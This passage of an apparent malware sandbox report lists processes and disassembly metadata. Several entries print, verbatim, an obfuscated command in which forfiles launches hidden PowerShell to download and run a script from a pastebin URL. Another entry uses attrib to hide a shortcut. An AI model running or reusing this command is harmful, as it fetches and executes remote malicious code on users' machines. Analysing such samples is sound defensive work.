                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                            Imagebase:0x7ff78b7e0000
                                            File size:52'224 bytes
                                            MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:10:08:27
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6ee680000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:8
                                            Start time:10:08:27
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                            Imagebase:0x7ff6cb6b0000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:9
                                            Start time:10:08:28
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                            Imagebase:0x7ff7194a0000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:10
                                            Start time:10:08:29
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\attrib.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                            Imagebase:0x7ff60df50000
                                            File size:23'040 bytes
                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:11
                                            Start time:10:08:35
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\forfiles.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                            Imagebase:0x7ff78b7e0000
                                            File size:52'224 bytes
                                            MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:12
                                            Start time:10:08:35
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7d0b40000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:13
                                            Start time:10:08:35
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                            Imagebase:0x7ff6cb6b0000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:14
                                            Start time:10:08:36
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                            Imagebase:0x7ff6cb6b0000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Executed Functions

                                              Function 00007FFB4AE10890 Relevance: .8, Instructions: 822COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2714543790.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffb4ae10000_vF20HtY4a4.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e6a53b6ba18cee65ed171cc4bfc943f2a3c844025ce29c94b6cb2c9a8796f91
                                              • Instruction ID: 0d8d7b4bcd1140e6cea762b15ebf07b0e6d185e12858ad419fb56d731decdaa1
                                              • Opcode Fuzzy Hash: 8e6a53b6ba18cee65ed171cc4bfc943f2a3c844025ce29c94b6cb2c9a8796f91
                                              • Instruction Fuzzy Hash: F76186A164EA960FE396BF7CC8562BA7FD0EF86260B2540FED099C7293CC1C4C468341

                                              Execution Graph

                                              Execution Coverage:3.2%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:0%
                                              Total number of Nodes:3
                                              Total number of Limit Nodes:0
                                              execution_graph 8971 7ffb4ae3663a 8972 7ffb4ae36c50 LoadLibraryExW 8971->8972 8974 7ffb4ae36cdd 8972->8974

                                              Executed Functions

                                              Function 00007FFB4AE2B966 Relevance: .5, Instructions: 477COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 164 7ffb4ae2b966-7ffb4ae2b973 165 7ffb4ae2b97e-7ffb4ae2ba47 164->165 166 7ffb4ae2b975-7ffb4ae2b97d 164->166 170 7ffb4ae2bab3 165->170 171 7ffb4ae2ba49-7ffb4ae2ba52 165->171 166->165 172 7ffb4ae2bab5-7ffb4ae2bada 170->172 171->170 173 7ffb4ae2ba54-7ffb4ae2ba60 171->173 180 7ffb4ae2badc-7ffb4ae2bae5 172->180 181 7ffb4ae2bb46 172->181 174 7ffb4ae2ba62-7ffb4ae2ba74 173->174 175 7ffb4ae2ba99-7ffb4ae2bab1 173->175 177 7ffb4ae2ba76 174->177 178 7ffb4ae2ba78-7ffb4ae2ba8b 174->178 175->172 177->178 178->178 179 7ffb4ae2ba8d-7ffb4ae2ba95 178->179 179->175 180->181 182 7ffb4ae2bae7-7ffb4ae2baf3 180->182 183 7ffb4ae2bb48-7ffb4ae2bbf0 181->183 184 7ffb4ae2bb2c-7ffb4ae2bb44 182->184 185 7ffb4ae2baf5-7ffb4ae2bb07 182->185 194 7ffb4ae2bc5e 183->194 195 7ffb4ae2bbf2-7ffb4ae2bbfc 183->195 184->183 187 7ffb4ae2bb0b-7ffb4ae2bb1e 185->187 188 7ffb4ae2bb09 185->188 187->187 190 7ffb4ae2bb20-7ffb4ae2bb28 187->190 188->187 190->184 197 7ffb4ae2bc60-7ffb4ae2bc89 194->197 195->194 196 7ffb4ae2bbfe-7ffb4ae2bc0b 195->196 198 7ffb4ae2bc0d-7ffb4ae2bc1f 196->198 199 7ffb4ae2bc44-7ffb4ae2bc5c 196->199 203 7ffb4ae2bc8b-7ffb4ae2bc96 197->203 204 7ffb4ae2bcf3 197->204 201 7ffb4ae2bc21 198->201 202 7ffb4ae2bc23-7ffb4ae2bc36 198->202 199->197 201->202 202->202 205 7ffb4ae2bc38-7ffb4ae2bc40 202->205 203->204 206 7ffb4ae2bc98-7ffb4ae2bca6 203->206 207 7ffb4ae2bcf5-7ffb4ae2bd9b 204->207 205->199 208 7ffb4ae2bcdf-7ffb4ae2bcf1 206->208 209 7ffb4ae2bca8-7ffb4ae2bcba 206->209 216 7ffb4ae2bd9d 207->216 217 7ffb4ae2bda3-7ffb4ae2bddd call 7ffb4ae2be24 207->217 208->207 210 7ffb4ae2bcbe-7ffb4ae2bcd1 209->210 211 7ffb4ae2bcbc 209->211 210->210 213 7ffb4ae2bcd3-7ffb4ae2bcdb 210->213 211->210 213->208 216->217 223 7ffb4ae2bde2-7ffb4ae2be08 217->223 224 7ffb4ae2be0f-7ffb4ae2be23 223->224 225 7ffb4ae2be0a 223->225 225->224
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2017364633.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ffb4ae20000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f33b807f50768f8d482bec949121874bf39ccaa03e512f07fc7c5376a724d16b
                                              • Instruction ID: b4722da2b5cdef7c637fd698cd2be6de361af44d76e3c9d6703f555162b96450
                                              • Opcode Fuzzy Hash: f33b807f50768f8d482bec949121874bf39ccaa03e512f07fc7c5376a724d16b
                                              • Instruction Fuzzy Hash: 91F1C67150CA4D8FEBA9EF28C8567E937D1FF68310F1442AAE85DC7295CF3499418B82
                                              Function 00007FFB4AE2C712 Relevance: .5, Instructions: 463COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 226 7ffb4ae2c712-7ffb4ae2c71f 227 7ffb4ae2c721-7ffb4ae2c729 226->227 228 7ffb4ae2c72a-7ffb4ae2c7f7 226->228 227->228 232 7ffb4ae2c863 228->232 233 7ffb4ae2c7f9-7ffb4ae2c802 228->233 234 7ffb4ae2c865-7ffb4ae2c88a 232->234 233->232 235 7ffb4ae2c804-7ffb4ae2c810 233->235 242 7ffb4ae2c88c-7ffb4ae2c895 234->242 243 7ffb4ae2c8f6 234->243 236 7ffb4ae2c812-7ffb4ae2c824 235->236 237 7ffb4ae2c849-7ffb4ae2c861 235->237 238 7ffb4ae2c826 236->238 239 7ffb4ae2c828-7ffb4ae2c83b 236->239 237->234 238->239 239->239 241 7ffb4ae2c83d-7ffb4ae2c845 239->241 241->237 242->243 245 7ffb4ae2c897-7ffb4ae2c8a3 242->245 244 7ffb4ae2c8f8-7ffb4ae2c91d 243->244 251 7ffb4ae2c98b 244->251 252 7ffb4ae2c91f-7ffb4ae2c929 244->252 246 7ffb4ae2c8dc-7ffb4ae2c8f4 245->246 247 7ffb4ae2c8a5-7ffb4ae2c8b7 245->247 246->244 249 7ffb4ae2c8bb-7ffb4ae2c8ce 247->249 250 7ffb4ae2c8b9 247->250 249->249 253 7ffb4ae2c8d0-7ffb4ae2c8d8 249->253 250->249 255 7ffb4ae2c98d-7ffb4ae2c9bb 251->255 252->251 254 7ffb4ae2c92b-7ffb4ae2c938 252->254 253->246 256 7ffb4ae2c971-7ffb4ae2c989 254->256 257 7ffb4ae2c93a-7ffb4ae2c94c 254->257 262 7ffb4ae2c9bd-7ffb4ae2c9c8 255->262 263 7ffb4ae2ca2b 255->263 256->255 258 7ffb4ae2c94e 257->258 259 7ffb4ae2c950-7ffb4ae2c963 257->259 258->259 259->259 261 7ffb4ae2c965-7ffb4ae2c96d 259->261 261->256 262->263 265 7ffb4ae2c9ca-7ffb4ae2c9d8 262->265 264 7ffb4ae2ca2d-7ffb4ae2cb1a 263->264 276 7ffb4ae2cb1c 264->276 277 7ffb4ae2cb22-7ffb4ae2cb3c 264->277 266 7ffb4ae2ca11-7ffb4ae2ca29 265->266 267 7ffb4ae2c9da-7ffb4ae2c9ec 265->267 266->264 268 7ffb4ae2c9ee 267->268 269 7ffb4ae2c9f0-7ffb4ae2ca03 267->269 268->269 269->269 271 7ffb4ae2ca05-7ffb4ae2ca0d 269->271 271->266 276->277 280 7ffb4ae2cb45-7ffb4ae2cb84 call 7ffb4ae2cba0 277->280 284 7ffb4ae2cb8b-7ffb4ae2cb9f 280->284 285 7ffb4ae2cb86 280->285 285->284
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2017364633.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ffb4ae20000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 43161e74c827c7dfd2b1eaff2829583c2f9bc7115a4353c54585b3afcdf119e8
                                              • Instruction ID: 1f491268c9cce1c29c4171490e570336b926850da032d79950c23dfaa1cdd199
                                              • Opcode Fuzzy Hash: 43161e74c827c7dfd2b1eaff2829583c2f9bc7115a4353c54585b3afcdf119e8
                                              • Instruction Fuzzy Hash: 0AE1D47190CA4D8FEBA8EF38C8557E977D1FF98310F24826AD85DC7291CE74A8418782
                                              Function 00007FFB4AEF09F2 Relevance: 2.9, Strings: 2, Instructions: 403COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2017771849.00007FFB4AEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ffb4aef0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 1@_L$6=!
                                              • API String ID: 0-1745356557
                                              • Opcode ID: c4a8e8b94230ed36a5aa6a729e40568207c52d46bfadfebff8c7a5c6fc0af778
                                              • Instruction ID: b9028eedec39ce9a937b880e20448ee8cb6691fe45e45d232cc11b201b078bf2
                                              • Opcode Fuzzy Hash: c4a8e8b94230ed36a5aa6a729e40568207c52d46bfadfebff8c7a5c6fc0af778
                                              • Instruction Fuzzy Hash: 5FC15571A0EB855FE79ABF3888599657BE1EF5621072901FFD049CB1A3E914AC0AC381
                                              Function 00007FFB4AEF0A2B Relevance: 2.7, Strings: 2, Instructions: 245COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2017771849.00007FFB4AEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ffb4aef0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 1@_L$6=!
                                              • API String ID: 0-1745356557
                                              • Opcode ID: c05837d952e837eb21e332957a1c61216d8b8c40a69f23d16ec7f5182105c828
                                              • Instruction ID: 6019bbc3e33b17b3cfc1635f0e397d77f7ab6c6835bc79b71b245b88af13f589
                                              • Opcode Fuzzy Hash: c05837d952e837eb21e332957a1c61216d8b8c40a69f23d16ec7f5182105c828
                                              • Instruction Fuzzy Hash: 177134B1A0DB455FEB99FE38C4868297BE1FF9531072501FEE44AC71A2E924EC46C781
                                              Function 00007FFB4AE3663A Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 156 7ffb4ae3663a-7ffb4ae36c9f 159 7ffb4ae36ca1-7ffb4ae36ca6 156->159 160 7ffb4ae36ca9-7ffb4ae36cdb LoadLibraryExW 156->160 159->160 161 7ffb4ae36cdd 160->161 162 7ffb4ae36ce3-7ffb4ae36d0a 160->162 161->162
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2017364633.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ffb4ae20000_powershell.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: de322a399273096f2b8ec14a74f24a428ddee0c141f48ee5e0db5ba9131d699e
                                              • Instruction ID: e9a49a68fc53da8d1f4096e4d0666a98f4e5c952898823fc90dc386fa59f8486
                                              • Opcode Fuzzy Hash: de322a399273096f2b8ec14a74f24a428ddee0c141f48ee5e0db5ba9131d699e
                                              • Instruction Fuzzy Hash: 8321A27190CA1C9FDB58EF6CD449BFABBE0FB65311F10822ED009D3251DB71A4168B91
                                              Function 00007FFB4AEF33D5 Relevance: .5, Instructions: 453COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 286 7ffb4aef33d5-7ffb4aef3419 288 7ffb4aef3476-7ffb4aef3477 286->288 289 7ffb4aef341b-7ffb4aef3464 286->289 290 7ffb4aef347c-7ffb4aef3483 288->290 296 7ffb4aef346a-7ffb4aef3474 289->296 297 7ffb4aef36cc-7ffb4aef378b 289->297 294 7ffb4aef3485-7ffb4aef348b 290->294 295 7ffb4aef348d-7ffb4aef3492 290->295 294->295 298 7ffb4aef3498-7ffb4aef349b 295->298 299 7ffb4aef3670-7ffb4aef367a 295->299 296->288 296->295 303 7ffb4aef34b2 298->303 304 7ffb4aef349d-7ffb4aef34b0 298->304 301 7ffb4aef3689-7ffb4aef36c9 299->301 302 7ffb4aef367c-7ffb4aef3688 299->302 301->297 308 7ffb4aef34b4-7ffb4aef34b6 303->308 304->308 308->299 310 7ffb4aef34bc-7ffb4aef34d4 308->310 310->290 316 7ffb4aef34d6-7ffb4aef34f0 310->316 324 7ffb4aef3507 316->324 325 7ffb4aef34f2-7ffb4aef3505 316->325 328 7ffb4aef3509-7ffb4aef350b 324->328 325->328 328->299 329 7ffb4aef3511-7ffb4aef3519 328->329 329->297 331 7ffb4aef351f-7ffb4aef3529 329->331 332 7ffb4aef3545-7ffb4aef3555 331->332 333 7ffb4aef352b-7ffb4aef3543 331->333 332->299 336 7ffb4aef355b-7ffb4aef358c 332->336 333->332 336->299 343 7ffb4aef3592-7ffb4aef35bb 336->343 348 7ffb4aef35bc-7ffb4aef35be 343->348 349 7ffb4aef35e9 348->349 350 7ffb4aef35c0-7ffb4aef35e0 348->350 351 7ffb4aef35eb-7ffb4aef35ed 349->351 350->348 354 7ffb4aef35e2-7ffb4aef35e7 350->354 351->299 353 7ffb4aef35f3-7ffb4aef35fb 351->353 355 7ffb4aef35fd-7ffb4aef3607 353->355 356 7ffb4aef360b 353->356 354->351 357 7ffb4aef3609 355->357 358 7ffb4aef3627-7ffb4aef3656 355->358 359 7ffb4aef3610-7ffb4aef3625 356->359 357->359 364 7ffb4aef365d-7ffb4aef366f 358->364 359->358
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2017771849.00007FFB4AEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ffb4aef0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 35a79e675f732dc7564dd71af7bcd4657712f3621c6a04527b136164f3c38fe0
                                              • Instruction ID: fdc0e3e03e4cbe16f82c5a1b779c364182d6503db712218b1c5a562596244539
                                              • Opcode Fuzzy Hash: 35a79e675f732dc7564dd71af7bcd4657712f3621c6a04527b136164f3c38fe0
                                              • Instruction Fuzzy Hash: CFD134A2A0EA8A5FE796FF78C8591F57F94FF56310F2800FAE46CC7193D91898058391

                                              Non-executed Functions

                                              Function 00007FFB4AE2D1B1 Relevance: 3.0, Strings: 2, Instructions: 505COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2017364633.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_7ffb4ae20000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "m$#m
                                              • API String ID: 0-3539297580
                                              • Opcode ID: fd45ec72305c68b106147be45fc53dfbeaa0c5beddeac0df6a1f0d4c009acc9c
                                              • Instruction ID: acbea605e56850a90e8dd4859cbfc2dccd42c6bc567208fcbe6d5cb1240861af
                                              • Opcode Fuzzy Hash: fd45ec72305c68b106147be45fc53dfbeaa0c5beddeac0df6a1f0d4c009acc9c
                                              • Instruction Fuzzy Hash: 45D124C3A0D26285E2123ABDF4520FC6B08DF85375B18C1F7DB9D990C78E4961AB52F6